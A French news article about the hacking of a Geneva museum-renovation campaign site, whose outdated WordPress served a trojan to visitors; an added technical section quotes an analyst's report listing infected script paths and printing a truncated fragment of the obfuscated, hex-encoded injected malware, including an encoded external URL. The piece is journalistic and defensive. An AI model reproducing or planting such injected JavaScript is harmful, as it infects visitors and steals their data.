Le site des partisans du MAH+ a été piraté (et c'est contagieux)

Le site des partisans du MAH+ a été piraté (et c’est contagieux)

Par dans Electronique, Politique le 11 février 2016

Le site des partisans du oui à la rénovation du Musée d’art et d’histoire (MAH+) a été piraté. Les ordinateurs s’y connectant sont la cible d’un virus. Ce code malicieux peut prendre possession de la machine, lire, télécharger les données, copier les mots de passe ou injecter de la publicité non désirée.

L’infection a été relevée par le journaliste spécialisé Jean-Marc Zermatten: «Je voulais accéder à www.ouiaumusee.ch lorsque mon antivirus a affiché huit messages d’infections bloquées en provenance de ce site». Le virus, de type cheval de Troie est nommé pour l’heure js:iframe epm. Parallèlement, Google affiche désormais lors d’une recherche sur le MAH+: «Il est possible que ce site ait été piraté.» 

Le site des partisans du MAH+ a été piraté (et c'est contagieux)

Capture d’écran d’une recherche Google et de l’avertissement. (DR)

Après avoir analysé l’attaque Pierre-Yves Justice*, un informaticien spécialisé dans les problèmes de sécurité affirme: «Il s’agit d’un virus récent et la majorité des antivirus ne le prend pas encore en compte. Cela signifie qu’une grande part des gens qui surfent sur ce site sont potentiellement infectés.»

Pour Jean-Marc Zermatten, la situation est préoccupante: «Cela fait plus de dix jours que ça dure et les administrateurs de Oui au Musée ne semblent même pas s’en être rendus compte. Je suis plutôt favorable au projet Nouvel, mais lorsqu’on veut entreprendre un chantier de plus de 130 millions de francs, il faudrait d’abord savoir gérer la sécurité de sa plateforme informatique.»

Imp_Ecr_Antivirus_Hack_ouiaumusee

Cliquer pour agrandir (DR)

«Les hackers ont profité de failles présentes dans la version de WordPress utilisée pour créer le site des partisans du MAH+», précise Pierre-Yves Justice. «Celles-ci sont régulièrement découvertes et comblées par les éditeurs du logiciel et des extensions qui s’y greffent», continue le spécialiste. «Mais encore faut-il que les responsables des sites mettent ces programmes à jour très régulièrement»

«Les sites WordPress non mis à jour peuvent être piratés par un gamin de 10 ans en quelques minutes», ajoute Ilia Kolochenko, CEO de High Tech Bridge, spécialiste genevois de la sécurité informatique. «Dans ce cas, il est probable qu’il s’agisse de créer un parc d’ordinateurs zombies aux ordres du commanditaire de l’attaque.»

Informé de la situation, Sébastien Bourqui, du Cabinet Privé de Conseils SA, les communicants chargés de mettre en forme la campagne favorable au projet Jean Nouvel, fait savoir qu’«une première analyse ne révèle rien d’anormal. Mais nous allons basculer sur une version saine de WordPress au plus vite afin d’éviter toute complication.»  Questionné sur le délai entre l’attaque par les hackers et la prise de mesures, M. Bourqui ajoute encore: «J’ai fait confiance aux techniciens. Ceci dit, j’imagine que bien d’autres sites doivent souffrir de la même faille.»

«Aujourd’hui, on ne peut plus faire confiance à un lien internet», estime encore Ilia Kolochenko. Le moyen de se protéger efficacement, à «99,5%», existe pourtant: «Mettez régulièrement à jour le système d’exploitation de votre ordinateur ou téléphone, ne cliquez en aucun cas sur des liens envoyés par des inconnus, utilisez un antivirus bien configuré».

Les enjeux de la votation

Les habitants de la ville de Genève voteront le 28 février sur la rénovation et l’extension du MAH. Le projet est estimé à 131 millions de francs. La moitié des fonds provient de donateurs privés. Les travaux devraient permettre d’étendre les surfaces d’exposition, notamment en utilisant l’actuelle cour du musée. Le MAH nouveau accueillera également la collection Gandur d’art moderne.

Le comité référendaire dénonce quant à lui un coût démesuré, la pertinence du projet architectural signé Jean Nouvel, la mise à disposition de surfaces à la collection Gandur et une atteinte au patrimoine. La campagne a été marquée par des attaques médiatiques et personnelles d’une rare vigueur.

Un peu de technique
[ajouté le 12.02.16] Pour ceux qui sont intéressés au protocole de test utilisé pour déterminer la menace représentée par le virus présent sur le site www.ouiaumusée.ch, vous trouverez ci-dessous le rapport de sécurité remis par M. Justice. Les termes entre crochets [] sont de la rédaction

En résumé, l’attaque consiste à profiter d’une faille dans WordPress ou un de ses greffons. Un programme est ainsi introduit sur le serveur du site visé qui va alors télécharger le virus. Celui-ci va se cacher dans les tréfonds de l’administration du site. Ici, il modifie les fichiers javascript en y ajoutant du code qui s’exécutera sans bruit.

Voici l’analyse virus total de 3 librairies javascript vérolées

https://www.virustotal.com/fr/file/7a5fa337076d99e…
https://www.virustotal.com/fr/file/7199b83454be8b4…
https://www.virustotal.com/fr/file/0e05aacbc2506f5…

A mon avis au moins les 8 fichiers javascript détectés par l’avast [l’antivirus] de la personne sont vérolés, mais peut-être d’autres …?

La plupart des javascript vérolés (j’ai pas tout testé) sont en début et fin de page du site

soit :

http://www.ouiaumusee.ch/wp-includes/js/jquery/jqu…
http://www.ouiaumusee.ch/wp-includes/js/jquery/jqu…
http://www.ouiaumusee.ch/wp-content/plugins/revsli…
http://www.ouiaumusee.ch/wp-content/themes/enfold/…
http://www.ouiaumusee.ch/wp-content/themes/enfold/…
http://www.ouiaumusee.ch/wp-content/themes/enfold/…
http://www.ouiaumusee.ch/wp-content/themes/enfold/…
http://www.ouiaumusee.ch/wp-content/themes/enfold/…
http://www.ouiaumusee.ch/wp-includes/js/mediaeleme…
http://www.ouiaumusee.ch/wp-includes/js/mediaeleme…

le code du malware injecté dans les javascript, est parfois à la fin mais aussi au milieu. Le code est polymorphe (pas le même dans les différentes librairies vérolées) et obfusqué [rendu illisible]. Par exemple le début du code d’une des infections :

jQuery.noConflict();/*945a85f6bf703aa79eafd2cccd43546e*/;window[« \x64\x6f\x63\x75\x6d\x65\x6e\x74 »][« \x64\x66\x62\x74\x7a »]=[« \x34\x37\x31\x32\x39\x33\x62\x37\x64\x37\x64\x22\x3b\x66\x6f\x72\x20\x28\x76\x61\x72\x20\x72\x79\x64\x79\x6e\x3d\x30\x3b\x72\x79\x64\x79\x6e\x3c\x68\x6b\x65\x62\x61\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x72\x79\x64\x79\x6e\x2b\x3d\x32\x29\x7b\x72\x6e\x6e\x61\x66\x3d\x72\x6e\x6e\x61\x66\x2b\x70\x61\x72\x73\x65\x49\x6e\x74\x28\x68\x6b\x65\x62\x61\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x72\x79\x64\x79\x6e »…

Il utilise des character escape déjà pour rendre la lecture difficile. Quand on les traduit ça donne :

jQuery.noConflict();/*945a85f6bf703aa79eafd2cccd43546e*/;window[« document »][« dfbtz »]=[« 471293b7d7d »;for (var rydyn=0;rydyn<hkeba.length;rydyn+=2){rnnaf=rnnaf+parseInt(hkeba.substring(rydyn », »172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b76617220783232717120″, »3232313564396665383431623335373465393722293b69662820783333647120213d202263383361373263343231623237363″, »96f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e73657444617465″, »3d2022687474703a2f2f767a61642e737465727661706f696d656e696f6c79612e696e666f2f6d656761616476657274697a6″, …

Il y a du travail sur des chaînes de caractères, transformées, ajoutées etc, pour rendre le truc dynamique et complexe. Le début « /*945a85f6bf703a9eafd2cccd43546e*/ » qui est un commentaire à mon avis utilisé par les créateurs pour identifier de manière unique l’infection, ou alors même utilisé dans le code javascript pour décrypter une partie …?

J’ai tenté de dé-obfusquer le code avec http://jsbeautifier.org/ mais sans succès.

Le truc semble vraiment vicieux comme il est caché.

* Nom connu de la rédaction


Abonnez-vous à notre newsletter mensuelle (et recevez les meilleurs articles publiés).

2 thoughts on “Le site des partisans du MAH+ a été piraté (et c’est contagieux)

  1. 1

    Comme cette votation est pourrie d’avance, un virus de plus ou de moins, moi mort-de-rire !

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée.

Facebook IconTwitter IconIMa page Google+IMa page Google+